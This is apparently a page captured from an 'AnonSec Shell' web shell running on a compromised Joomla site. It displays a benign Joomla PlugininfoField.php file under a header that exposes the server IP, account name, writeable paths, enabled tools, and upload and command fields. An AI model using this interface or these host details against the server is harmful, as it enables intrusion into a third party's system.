AnonSec Shell
Server IP : 46.105.57.169  /  Your IP : 216.73.216.144
Web Server : Apache
System : Linux webd003.cluster120.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : maitricfuz ( 93378)
PHP Version : 8.4.10
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/maitricfuz/www/maitric/administrator/components/com_actionlogs/src/Field/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/maitricfuz/www/maitric/administrator/components/com_actionlogs/src/Field/PlugininfoField.php
<?php

/**
 * @package     Joomla.Administrator
 * @subpackage  com_actionlogs
 *
 * @copyright   (C) 2018 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

namespace Joomla\Component\Actionlogs\Administrator\Field;

use Joomla\CMS\Form\FormField;
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Router\Route;

// phpcs:disable PSR1.Files.SideEffects
\defined('_JEXEC') or die;
// phpcs:enable PSR1.Files.SideEffects

/**
 * Information field.
 *
 * @since  3.9.2
 */
class PlugininfoField extends FormField
{
    /**
     * The form field type.
     *
     * @var    string
     * @since  3.9.2
     */
    protected $type = 'PluginInfo';

    /**
     * Method to get the field input markup.
     *
     * @return  string    The field input markup.
     *
     * @since   3.9.2
     */
    protected function getInput()
    {
        $db     = $this->getDatabase();
        $query  = $db->getQuery(true)
            ->select($db->quoteName('extension_id'))
            ->from($db->quoteName('#__extensions'))
            ->where($db->quoteName('folder') . ' = ' . $db->quote('actionlog'))
            ->where($db->quoteName('element') . ' = ' . $db->quote('joomla'));
        $db->setQuery($query);

        $result = (int) $db->loadResult();

        $link = HTMLHelper::_(
            'link',
            Route::_('index.php?option=com_plugins&task=plugin.edit&extension_id=' . $result),
            Text::_('PLG_SYSTEM_ACTIONLOGS_JOOMLA_ACTIONLOG_DISABLED'),
            ['class' => 'alert-link']
        );

        return '<div class="alert alert-info">'
            . '<span class="icon-info-circle" aria-hidden="true"></span><span class="visually-hidden">'
            . Text::_('INFO')
            . '</span>'
            . Text::sprintf('PLG_SYSTEM_ACTIONLOGS_JOOMLA_ACTIONLOG_DISABLED_REDIRECT', $link)
            . '</div>';
    }
}

Anon7 - 2022
AnonSec Team